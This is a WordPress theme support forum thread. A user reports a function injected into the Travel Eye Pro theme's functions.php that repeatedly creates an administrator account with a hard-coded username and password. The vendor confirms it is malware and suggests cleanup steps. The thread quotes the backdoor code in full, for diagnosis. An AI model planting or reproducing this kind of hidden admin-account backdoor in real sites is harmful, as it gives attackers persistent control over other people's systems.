Home Forums Pro Themes Travel Eye Pro Unauthorized user added to"wp-content/themes/travel-eye-pro/functions.php" file

This topic contains 1 reply, has 2 voices, and was last updated by  wensolutions 4 weeks, 1 day ago.

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • #104555

    Ashley Moss
    Participant

    Hello,

    There is an unauthorized user being created in the travel eye pro functions.php file.

    Below is the code:

    function wpb_admin_account(){
    $user = ‘UsernamE’;
    $pass = ‘UsernamE’;
    $email = ’email@domain.com’;
    //if a username with the email ID does not exist, create a new user account
    if ( !username_exists( $user ) && !email_exists( $email ) ) {
    $user_id = wp_create_user( $user, $pass, $email );
    $user = new WP_User( $user_id );
    //Set the new user as a Admin
    $user->set_role( ‘administrator’ );
    } }

    What is happening here is that this function creates a user with the Username of UsernamE and same password and the email is email@domain.com. Now every time you delete this, this file will create this user again and give admin role to the user.

    Can you please check if this code is a part of Travel Eye theme functions.php file or if you know the purpose of this code?

    Thank you!

    #104572

    wensolutions
    Keymaster

    Hello @lynaeash,

    The code is not in our core file. It must be a malware infection as you have mentioned.

    Malware infection could be injected in four ways
    1 – using fake WordPress admin user credentials
    2 – via a vulnerable plugin(s) installed on your system
    3 – via previously installed malicious shell used to reinfect other
    4 – In the case of shared hosting or multiple sites on the same hosting account, the infection may come from other sites as well

    It is worth to
    1 – reset all WordPress password and review/remove all suspicious uses
    2 – investigate your WordPress setup with other security plugins
    3 – investigate website access log to locate what exactly exploited on your side

    So please verify these steps.

    Thank you.

Viewing 2 posts - 1 through 2 (of 2 total)

You must be logged in to reply to this topic.